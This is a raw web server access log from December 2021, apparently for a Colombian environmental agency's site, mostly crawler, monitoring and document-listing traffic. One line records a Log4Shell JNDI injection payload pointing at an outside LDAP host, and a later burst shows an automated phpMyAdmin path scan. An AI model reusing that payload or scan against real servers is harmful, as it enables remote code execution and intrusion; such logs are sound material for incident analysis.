173.231.60.194 - - [19/Dec/2021:01:48:38 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202013%2F&sort=name&order=desc HTTP/1.1" 200 405308
173.231.60.194 - - [19/Dec/2021:01:48:46 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202014%2F&sort=name&order=desc HTTP/1.1" 200 872432
173.231.60.194 - - [19/Dec/2021:01:48:54 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202015%2F&sort=name&order=desc HTTP/1.1" 200 575854
173.231.60.194 - - [19/Dec/2021:01:49:02 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202016%2F&sort=name&order=desc HTTP/1.1" 200 324286
173.231.60.194 - - [19/Dec/2021:01:49:12 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202017%2F&sort=name&order=desc HTTP/1.1" 200 454781
173.231.60.194 - - [19/Dec/2021:01:49:19 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202018%2F&sort=name&order=desc HTTP/1.1" 200 421600
173.231.60.194 - - [19/Dec/2021:01:49:27 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202019%2F&sort=name&order=desc HTTP/1.1" 200 330426
173.231.60.194 - - [19/Dec/2021:01:49:34 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202020%2F&sort=name&order=desc HTTP/1.1" 200 314916
173.231.60.194 - - [19/Dec/2021:01:49:42 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202021%2F&sort=name&order=desc HTTP/1.1" 200 229753
173.231.60.194 - - [19/Dec/2021:01:49:49 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202005%2FRES%202005%201-50%2F HTTP/1.1" 200 12563
173.231.60.194 - - [19/Dec/2021:01:50:01 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%201-50%2F HTTP/1.1" 200 11867
173.231.60.194 - - [19/Dec/2021:01:50:10 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%201801-%201900%2F HTTP/1.1" 200 22159
173.231.60.194 - - [19/Dec/2021:01:50:18 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FRESOLUCIONES%200020%2F HTTP/1.1" 200 2077
216.245.221.92 - - [19/Dec/2021:01:50:18 -0500] "HEAD / HTTP/1.1" 200 -
173.231.60.194 - - [19/Dec/2021:01:50:27 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FRESOLUCIONES%202012%2F HTTP/1.1" 200 2077
173.231.60.194 - - [19/Dec/2021:01:50:37 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FRESOLUCIONES%202013%2F HTTP/1.1" 200 2817
173.231.60.194 - - [19/Dec/2021:01:50:45 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FRESOLUCIONES%202014%2F HTTP/1.1" 200 13932
173.231.60.194 - - [19/Dec/2021:01:50:55 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FRESOLUCIONES%202015%2F HTTP/1.1" 200 14394
173.231.60.194 - - [19/Dec/2021:01:51:06 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FRESOLUCIONES%202016%2F HTTP/1.1" 200 17649
173.231.60.194 - - [19/Dec/2021:01:51:14 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FRESOLUCIONES%202017%2F HTTP/1.1" 200 10280
173.231.60.194 - - [19/Dec/2021:01:51:20 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FRESOLUCIONES%202018%2F HTTP/1.1" 200 17485
173.231.60.194 - - [19/Dec/2021:01:51:28 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FRESOLUCIONES%202019%2F HTTP/1.1" 200 37411
173.231.60.194 - - [19/Dec/2021:01:51:35 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FRESOLUCIONES%202020%2F HTTP/1.1" 200 51129
173.231.60.194 - - [19/Dec/2021:01:51:43 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FRESOLUCIONES%202021%2F HTTP/1.1" 200 79868
173.231.60.194 - - [19/Dec/2021:01:51:54 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002%2FRES%202002%2001-50%2F HTTP/1.1" 200 13729
173.231.60.194 - - [19/Dec/2021:01:52:08 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%201401%20-%201500%2F HTTP/1.1" 200 13545
173.231.60.194 - - [19/Dec/2021:01:52:18 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%201501%20-%201600%2F HTTP/1.1" 200 22232
173.231.60.194 - - [19/Dec/2021:01:52:24 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%201601%20-%201700%2F HTTP/1.1" 200 22248
173.231.60.194 - - [19/Dec/2021:01:52:32 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%201701%20-%201800%2F HTTP/1.1" 200 22247
173.231.60.194 - - [19/Dec/2021:01:52:42 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%201901%20-%202000%2F HTTP/1.1" 200 22186
173.231.60.194 - - [19/Dec/2021:01:52:50 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%202001%20-%202100%2F HTTP/1.1" 200 22199
173.231.60.194 - - [19/Dec/2021:01:52:57 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%202101%20-%202200%2F HTTP/1.1" 200 22204
173.231.60.194 - - [19/Dec/2021:01:53:05 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%202201%20-%202300%2F HTTP/1.1" 200 22194
173.231.60.194 - - [19/Dec/2021:01:53:12 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%202301%20-%202400%2F HTTP/1.1" 200 22197
173.231.60.194 - - [19/Dec/2021:01:53:20 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%202401%20-%202500%2F HTTP/1.1" 200 22199
173.231.60.194 - - [19/Dec/2021:01:53:27 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%202501%20-%202600%2F HTTP/1.1" 200 22209
152.61.192.232 - - [19/Dec/2021:01:53:36 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [19/Dec/2021:01:53:37 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [19/Dec/2021:01:53:38 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
201.245.192.253 - - [19/Dec/2021:01:54:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 110134
216.245.221.92 - - [19/Dec/2021:01:55:18 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.71 - - [19/Dec/2021:01:56:51 -0500] "GET /galeria/galeria/fotos/Entrenube2G.jpg HTTP/1.1" 200 111422
152.61.128.50 - - [19/Dec/2021:01:58:02 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [19/Dec/2021:01:58:04 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [19/Dec/2021:01:58:04 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
216.245.221.92 - - [19/Dec/2021:02:00:18 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.113 - - [19/Dec/2021:02:00:50 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12497
181.154.247.233 - - [19/Dec/2021:02:05:34 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [19/Dec/2021:02:05:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
216.245.221.92 - - [19/Dec/2021:02:06:18 -0500] "HEAD / HTTP/1.1" 200 -
190.159.250.99 - - [19/Dec/2021:02:10:38 -0500] "GET /en-esta-navidad-bogota-esta-mejorando-con-mas-espacios-verdes-para-el-disfrute-de-la-ciudadania.html HTTP/1.1" 200 1114
216.245.221.92 - - [19/Dec/2021:02:11:18 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.106 - - [19/Dec/2021:02:12:19 -0500] "GET /BLA/resoluciones/AUTOS%202016/3174.pdf HTTP/1.1" 200 345488
86.57.246.76 - - [19/Dec/2021:02:13:41 -0500] "GET /${jndi:ldap://5.101.118.127:1389/Exploit} HTTP/1.1" 403 1006
34.90.61.69 - - [19/Dec/2021:02:13:56 -0500] "GET / HTTP/1.1" 200 319
187.60.221.92 - - [19/Dec/2021:02:14:50 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [19/Dec/2021:02:15:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 110136
40.77.189.186 - - [19/Dec/2021:02:15:48 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 28513
40.77.189.159 - - [19/Dec/2021:02:15:48 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.ttf?93978679 HTTP/1.1" 200 21568
216.245.221.92 - - [19/Dec/2021:02:16:18 -0500] "HEAD / HTTP/1.1" 200 -
181.251.231.156 - - [19/Dec/2021:02:18:08 -0500] "GET /en-esta-navidad-bogota-esta-mejorando-con-mas-espacios-verdes-para-el-disfrute-de-la-ciudadania.html HTTP/1.1" 200 1114
40.77.167.55 - - [19/Dec/2021:02:18:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/0716.pdf HTTP/1.1" 200 682605
216.245.221.92 - - [19/Dec/2021:02:21:18 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.74 - - [19/Dec/2021:02:21:34 -0500] "-" 408 -
201.245.192.253 - - [19/Dec/2021:02:23:42 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Dec/2021:02:23:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44989
66.249.66.139 - - [19/Dec/2021:02:24:41 -0500] "-" 408 -
201.245.192.253 - - [19/Dec/2021:02:24:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43310
201.245.192.253 - - [19/Dec/2021:02:25:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 110136
94.228.11.112 - - [19/Dec/2021:02:26:05 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
94.228.11.112 - - [19/Dec/2021:02:26:05 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
94.228.11.112 - - [19/Dec/2021:02:26:05 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
216.245.221.92 - - [19/Dec/2021:02:26:18 -0500] "HEAD / HTTP/1.1" 200 -
132.184.131.199 - - [19/Dec/2021:02:29:17 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
35.202.2.1 - - [19/Dec/2021:02:29:37 -0500] "-" 408 -
20.36.244.102 - - [19/Dec/2021:02:30:09 -0500] "GET /noticias/rssambiente.php HTTP/1.1" 406 -
66.249.66.74 - - [19/Dec/2021:02:30:30 -0500] "-" 408 -
216.245.221.92 - - [19/Dec/2021:02:31:18 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Dec/2021:02:33:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44989
201.245.192.253 - - [19/Dec/2021:02:34:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43310
181.53.13.170 - - [19/Dec/2021:02:35:37 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.249.66.139 - - [19/Dec/2021:02:36:07 -0500] "-" 408 -
216.245.221.92 - - [19/Dec/2021:02:36:18 -0500] "HEAD / HTTP/1.1" 200 -
216.245.221.92 - - [19/Dec/2021:02:41:18 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Dec/2021:02:43:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44989
201.245.192.253 - - [19/Dec/2021:02:44:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43310
216.245.221.92 - - [19/Dec/2021:02:46:18 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.13 - - [19/Dec/2021:02:47:02 -0500] "-" 408 -
123.125.109.215 - - [19/Dec/2021:02:49:31 -0500] "GET / HTTP/1.1" 200 319
40.77.167.55 - - [19/Dec/2021:02:50:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/1522.pdf HTTP/1.1" 200 344606
216.245.221.92 - - [19/Dec/2021:02:51:18 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.139 - - [19/Dec/2021:02:53:59 -0500] "-" 408 -
201.245.192.253 - - [19/Dec/2021:02:55:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 110136
216.245.221.92 - - [19/Dec/2021:02:56:18 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.13 - - [19/Dec/2021:03:00:56 -0500] "-" 408 -
216.245.221.92 - - [19/Dec/2021:03:01:18 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Dec/2021:03:05:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
216.245.221.92 - - [19/Dec/2021:03:06:18 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.13 - - [19/Dec/2021:03:07:03 -0500] "-" 408 -
216.245.221.92 - - [19/Dec/2021:03:11:18 -0500] "HEAD / HTTP/1.1" 200 -
156.146.49.173 - - [19/Dec/2021:03:12:16 -0500] "GET /wp-login.php HTTP/1.1" 404 1035
66.249.66.139 - - [19/Dec/2021:03:13:52 -0500] "-" 408 -
173.231.60.194 - - [19/Dec/2021:03:14:21 -0500] "-" 408 -
34.90.183.107 - - [19/Dec/2021:03:15:14 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [19/Dec/2021:03:16:18 -0500] "HEAD / HTTP/1.1" 200 -
173.231.60.194 - - [19/Dec/2021:03:16:21 -0500] "-" 408 -
186.28.185.175 - - [19/Dec/2021:03:18:57 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.249.66.139 - - [19/Dec/2021:03:19:41 -0500] "-" 408 -
35.202.2.1 - - [19/Dec/2021:03:20:37 -0500] "-" 408 -
216.245.221.92 - - [19/Dec/2021:03:21:18 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.100 - - [19/Dec/2021:03:23:51 -0500] "-" 408 -
201.245.192.253 - - [19/Dec/2021:03:23:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45152
201.245.192.253 - - [19/Dec/2021:03:24:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43154
66.249.66.13 - - [19/Dec/2021:03:25:23 -0500] "-" 408 -
118.123.105.67 - - [19/Dec/2021:03:25:23 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
118.123.105.67 - - [19/Dec/2021:03:25:23 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
118.123.105.67 - - [19/Dec/2021:03:25:23 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
118.123.105.67 - - [19/Dec/2021:03:25:30 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
118.123.105.67 - - [19/Dec/2021:03:25:30 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
118.123.105.67 - - [19/Dec/2021:03:25:30 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
118.123.105.67 - - [19/Dec/2021:03:25:34 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
118.123.105.67 - - [19/Dec/2021:03:25:35 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
118.123.105.67 - - [19/Dec/2021:03:25:35 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
118.123.105.67 - - [19/Dec/2021:03:25:35 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
118.123.105.67 - - [19/Dec/2021:03:25:35 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
118.123.105.67 - - [19/Dec/2021:03:25:35 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
118.123.105.67 - - [19/Dec/2021:03:25:35 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
118.123.105.67 - - [19/Dec/2021:03:25:35 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
216.245.221.92 - - [19/Dec/2021:03:26:18 -0500] "HEAD / HTTP/1.1" 200 -
136.243.11.34 - - [19/Dec/2021:03:28:24 -0500] "GET /en-esta-navidad-bogota-esta-mejorando-con-mas-espacios-verdes-para-el-disfrute-de-la-ciudadania.html HTTP/1.1" 200 1114
66.249.66.205 - - [19/Dec/2021:03:31:14 -0500] "-" 408 -
216.245.221.92 - - [19/Dec/2021:03:31:18 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Dec/2021:03:33:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45152
201.245.192.253 - - [19/Dec/2021:03:34:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43154
201.245.192.253 - - [19/Dec/2021:03:35:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109737
200.118.62.60 - - [19/Dec/2021:03:35:54 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
216.245.221.92 - - [19/Dec/2021:03:36:18 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.55 - - [19/Dec/2021:03:36:32 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 195754
66.249.66.74 - - [19/Dec/2021:03:37:10 -0500] "-" 408 -
216.245.221.92 - - [19/Dec/2021:03:41:18 -0500] "HEAD / HTTP/1.1" 200 -
45.61.185.166 - - [19/Dec/2021:03:41:29 -0500] "GET /styles/js/app.js?v=5 HTTP/1.1" 404 1013
207.46.13.52 - - [19/Dec/2021:03:41:38 -0500] "GET /portaldeninos/2021/06/06/ciudadanos-disfrutaron-del-tunel-ambiental-en-el-parque-de-los-novios/feed/ HTTP/1.1" 200 1011
207.46.13.52 - - [19/Dec/2021:03:41:51 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/1160.pdf HTTP/1.1" 200 280887
66.249.66.76 - - [19/Dec/2021:03:42:55 -0500] "-" 408 -
201.245.192.253 - - [19/Dec/2021:03:43:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45152
201.245.192.253 - - [19/Dec/2021:03:44:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43154
201.245.192.253 - - [19/Dec/2021:03:44:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109737
216.245.221.92 - - [19/Dec/2021:03:46:18 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.76 - - [19/Dec/2021:03:50:08 -0500] "-" 408 -
216.245.221.92 - - [19/Dec/2021:03:51:18 -0500] "HEAD / HTTP/1.1" 200 -
86.57.246.76 - - [19/Dec/2021:03:52:23 -0500] "-" 408 -
86.57.246.76 - - [19/Dec/2021:03:52:24 -0500] "-" 408 -
40.77.167.71 - - [19/Dec/2021:03:54:02 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8224
40.77.167.71 - - [19/Dec/2021:03:54:04 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2020%2F HTTP/1.1" 200 314917
201.245.192.253 - - [19/Dec/2021:03:55:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109737
66.249.66.74 - - [19/Dec/2021:03:56:03 -0500] "-" 408 -
216.245.221.92 - - [19/Dec/2021:03:56:18 -0500] "HEAD / HTTP/1.1" 200 -
216.245.221.92 - - [19/Dec/2021:04:01:18 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.106 - - [19/Dec/2021:04:01:31 -0500] "GET /bla/resoluciones/autos%202018/3679.pdf HTTP/1.1" 200 340305
66.249.66.205 - - [19/Dec/2021:04:01:48 -0500] "-" 408 -
201.245.192.253 - - [19/Dec/2021:04:05:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
216.245.221.92 - - [19/Dec/2021:04:06:18 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.139 - - [19/Dec/2021:04:08:05 -0500] "-" 408 -
128.14.134.170 - - [19/Dec/2021:04:08:24 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [19/Dec/2021:04:11:18 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.113 - - [19/Dec/2021:04:11:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/1530.pdf HTTP/1.1" 200 750602
40.77.167.55 - - [19/Dec/2021:04:13:05 -0500] "GET /bla/resoluciones/resoluciones%202021/3722.pdf HTTP/1.1" 200 551760
66.249.66.139 - - [19/Dec/2021:04:15:42 -0500] "-" 408 -
201.245.192.253 - - [19/Dec/2021:04:15:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 110133
216.245.221.92 - - [19/Dec/2021:04:16:18 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.55 - - [19/Dec/2021:04:16:26 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/1194.pdf HTTP/1.1" 200 321632
40.77.167.55 - - [19/Dec/2021:04:17:04 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/03217.pdf HTTP/1.1" 200 624114
34.141.155.224 - - [19/Dec/2021:04:18:35 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [19/Dec/2021:04:21:18 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.74 - - [19/Dec/2021:04:21:47 -0500] "-" 408 -
195.154.209.237 - - [19/Dec/2021:04:23:04 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [19/Dec/2021:04:23:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44991
8.209.105.152 - - [19/Dec/2021:04:24:36 -0500] "GET /galeria/galeria/fotos/Huemdal-el-Tunjo1P.jpg HTTP/1.1" 200 24430
190.25.42.198 - - [19/Dec/2021:04:24:49 -0500] "GET /en-esta-navidad-bogota-esta-mejorando-con-mas-espacios-verdes-para-el-disfrute-de-la-ciudadania.html HTTP/1.1" 200 1114
201.245.192.253 - - [19/Dec/2021:04:24:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43307
201.245.192.253 - - [19/Dec/2021:04:24:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 110133
216.245.221.92 - - [19/Dec/2021:04:26:18 -0500] "HEAD / HTTP/1.1" 200 -
109.149.247.162 - - [19/Dec/2021:04:26:39 -0500] "GET /pma2014/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:39 -0500] "GET /phpMyAdmin-4.9.7/index.php?lang=en HTTP/1.1" 403 1165
109.149.247.162 - - [19/Dec/2021:04:26:39 -0500] "GET /phpMyAdmin5/index.php?lang=en HTTP/1.1" 403 1165
109.149.247.162 - - [19/Dec/2021:04:26:40 -0500] "GET /pma2017/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:40 -0500] "GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:40 -0500] "GET /sql/phpmyadmin4/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:41 -0500] "GET /administrator/admin/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:41 -0500] "GET /myadmin/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:41 -0500] "GET /PMA2014/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:42 -0500] "GET /phpmyadmin/index.php?lang=en HTTP/1.1" 403 1165
109.149.247.162 - - [19/Dec/2021:04:26:42 -0500] "GET /pma2017/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:42 -0500] "GET /administrator/web/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:43 -0500] "GET /_phpMyAdmin/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:43 -0500] "GET /admin/pMA/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:43 -0500] "GET /sql/sqladmin/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:44 -0500] "GET /PMA2016/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:44 -0500] "GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:44 -0500] "GET /administrator/PMA/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:45 -0500] "GET /php-my-admin/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:45 -0500] "GET /PMA2017/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:45 -0500] "GET /phpMyAdmin4/index.php?lang=en HTTP/1.1" 403 1165
109.149.247.162 - - [19/Dec/2021:04:26:46 -0500] "GET /db/db-admin/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:46 -0500] "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:46 -0500] "GET /phpMyAdmin-5/index.php?lang=en HTTP/1.1" 403 1165
109.149.247.162 - - [19/Dec/2021:04:26:47 -0500] "GET /PMA/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:47 -0500] "GET /mysql/db/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:47 -0500] "GET /2phpmyadmin/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:48 -0500] "GET /phpMyadmin/index.php?lang=en HTTP/1.1" 403 1165
54.39.177.48 - - [19/Dec/2021:04:26:48 -0500] "-" 408 -
109.149.247.162 - - [19/Dec/2021:04:26:48 -0500] "GET /mysql/dbadmin/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:48 -0500] "GET /pma2013/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:49 -0500] "GET /pma2012/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:49 -0500] "GET /phpmyadmin1/index.php?lang=en HTTP/1.1" 403 1165
109.149.247.162 - - [19/Dec/2021:04:26:49 -0500] "GET /phpmyadmin3/index.php?lang=en HTTP/1.1" 403 1165
109.149.247.162 - - [19/Dec/2021:04:26:50 -0500] "GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:50 -0500] "GET /_phpMyAdmin/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:50 -0500] "GET /admin/sysadmin/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:50 -0500] "GET /mysqlmanager/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:51 -0500] "GET /phpmyadmin2017/index.php?lang=en HTTP/1.1" 403 1165
109.149.247.162 - - [19/Dec/2021:04:26:51 -0500] "GET /PMA2018/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:51 -0500] "GET /PMA2021/index.php?lang=en HTTP/1.1" 404 1018
109.149.247.162 - - [19/Dec/2021:04:26:52 -0500] "GET /phpmyadmin2013/index.php?lang=en HTTP/1.1" 403 1165
